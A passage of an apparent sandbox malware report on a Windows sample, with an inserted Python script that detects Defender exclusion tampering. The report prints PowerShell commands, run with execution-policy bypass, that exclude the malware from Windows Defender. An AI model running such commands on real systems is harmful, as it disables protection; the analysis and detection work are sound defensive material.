                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (37 occurrences)
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe Process information set: NOOPENFILEERRORBOX (38 occurrences)

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (8 occurrences)
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Memory allocated: 1450000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Memory allocated: 1B020000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe Memory allocated: 1160000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe Memory allocated: 1ABD0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe Memory allocated: 2C20000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe Memory allocated: 1AE40000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 occurrences)
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Window / User API: threadDelayed 9665
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3743
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6046
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7349
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2208
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7702
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1978
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7435
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2220
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe TID: 2348 Thread sleep time: -32281802128991695s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492 Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052 Thread sleep count: 7435 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208 Thread sleep count: 2220 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364 Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe TID: 5192 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe TID: 612 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe File Volume queried: C:\ FullSizeInformation (9 occurrences)
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exe File Volume queried: C:\ FullSizeInformation (2 occurrences)
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BFBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Process token adjusted: Debug (2 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (4 occurrences)
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe' (4 occurrences)
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe' (3 occurrences)
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
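The Add-MpPreference command lines above (an -ExecutionPolicy Bypass launch from a user-path binary, excluding its own file and its dropped copy from Defender) are the part of this report a detection engineer would turn into a hunt, and the 922337203685477 delay values in the evasion section are easy to misread as a real timer. The following is an added example written for this page; it is not code from the sandbox report or from the sample. It parses process-creation command lines for Add-/Set-MpPreference, extracts the exclusion targets, rates them, and includes a helper that classifies sandbox-reported sleep values. The sample events are constructed to mirror the report's command lines; the user-writable root list, the 3-minute "long sleep" threshold and the severity scheme are assumptions made for the example.

```python
"""Added triage helpers for the behaviour above: flag Windows Defender exclusion
tampering in process-creation telemetry and classify sandbox-reported sleep values.
Example code written for this page; not part of the sandbox report or the sample."""
import re
from dataclasses import dataclass, field

# "-ex\w*" also catches the abbreviated parameter names PowerShell accepts (-ex, -exec).
MPPREF_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.I)
BYPASS_RE = re.compile(r"-ex\w*\s+(?:bypass|unrestricted)\b", re.I)
EXCL_RE = re.compile(r"-Exclusion(Path|Process|Extension|IpAddress)\s+"
                     r"(?:'([^']*)'|\"([^\"]*)\"|([^\s'\"]+))", re.I)

# Roots a legitimate admin rarely excludes; an exclusion there shields attacker-dropped
# files.  Assumption: an illustrative starting list, tune it for your estate.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\", "\\public\\")


@dataclass
class Finding:
    parent: str
    cmdline: str
    execution_policy_bypass: bool
    exclusions: list = field(default_factory=list)          # [(kind, value), ...]
    suspicious_targets: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Assumed scheme: bypass + attacker-controllable target is the XWorm pattern.
        if self.suspicious_targets and self.execution_policy_bypass:
            return "high"
        return "medium" if self.exclusions else "low"


def is_suspicious_target(kind: str, value: str) -> bool:
    """Path exclusions under user-writable roots, or process exclusions given as a bare
    file name (which exclude every process of that name wherever it runs)."""
    v = value.lower()
    if kind.lower() == "path":
        return any(marker in v for marker in USER_WRITABLE)
    if kind.lower() == "process":
        return "\\" not in v or any(marker in v for marker in USER_WRITABLE)
    return False


def analyze_command(parent: str, cmdline: str):
    """Return a Finding for an Add-/Set-MpPreference command line, else None."""
    if not MPPREF_RE.search(cmdline):
        return None
    finding = Finding(parent, cmdline, bool(BYPASS_RE.search(cmdline)))
    for m in EXCL_RE.finditer(cmdline):
        kind = m.group(1)
        value = next(g for g in m.groups()[1:] if g is not None)
        finding.exclusions.append((kind, value))
        if is_suspicious_target(kind, value):
            finding.suspicious_targets.append(value)
    return finding


def triage(events):
    """events: (parent_image, command_line) pairs, e.g. Sysmon EID 1 or Security 4688
    with command-line auditing enabled.  Returns the Findings in input order."""
    return [f for f in (analyze_command(p, c) for p, c in events) if f is not None]


def classify_delay(delay_ms: int) -> str:
    """NtDelayExecution takes a relative interval in 100 ns units.  A sandbox that
    divides Int64.MinValue (the kernel's encoding of 'infinite') by 10000 reports
    Sleep(INFINITE) as 922337203685477 ms: such a thread is parked for good, not
    waiting out the sandbox.  Assumption: 3 minutes as the 'long' threshold here."""
    if abs(delay_ms) >= (1 << 63) // 10000:
        return "infinite"
    return "long" if abs(delay_ms) >= 180_000 else "short"


# Constructed sample telemetry mirroring the command lines in the report, plus one
# benign and one admin-looking event for contrast.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PARENT = r"C:\Users\user\Desktop\9RgE5uOJwX.exe"
BYPASS = '"' + PS + '" -ExecutionPolicy Bypass '
SAMPLE_EVENTS = [
    (PARENT, BYPASS + r"Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'"),
    (PARENT, BYPASS + r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'"),
    (PARENT, BYPASS + r"Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'"),
    (PARENT, BYPASS + r"Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'"),
    (r"C:\Windows\explorer.exe", '"' + PS + '" Get-Process'),
    (r"C:\Program Files\Vendor\Agent.exe",
     '"' + PS + '" -NoProfile ' + r"Add-MpPreference -ExclusionPath 'C:\Program Files\SQL\'"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f.severity.upper(), f.exclusions, "bypass" if f.execution_policy_bypass else "")
    for v in (922337203685477, 200_000, 1_000):
        print(v, classify_delay(v))
```

Run against the constructed events, the four report-derived lines rate high (bypass plus a target under C:\Users\ or a bare process name), the vendor agent's Program Files exclusion rates medium, and the Get-Process launch produces no finding. Feeding the same function the Defender operational log's event 5007 text, or 4104 script-block content, is the obvious next step; the exclusion itself is also worth confirming on the host with Get-MpPreference, since an -ExclusionProcess entry survives deletion of the file it names.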
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exe Queries volume information: C:\Users\user\Desktop\9RgE5uOJwX.exe VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (15 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (3 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation (3 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (9 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation (3 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation (2 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation (2 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftClient.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftClient.exe VolumeInformation
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001C028000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BFBC000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BF80000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3419695572.000000001D070000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3374595417.00000000012CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match | File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 9RgE5uOJwX.exe PID: 2732, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match | File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
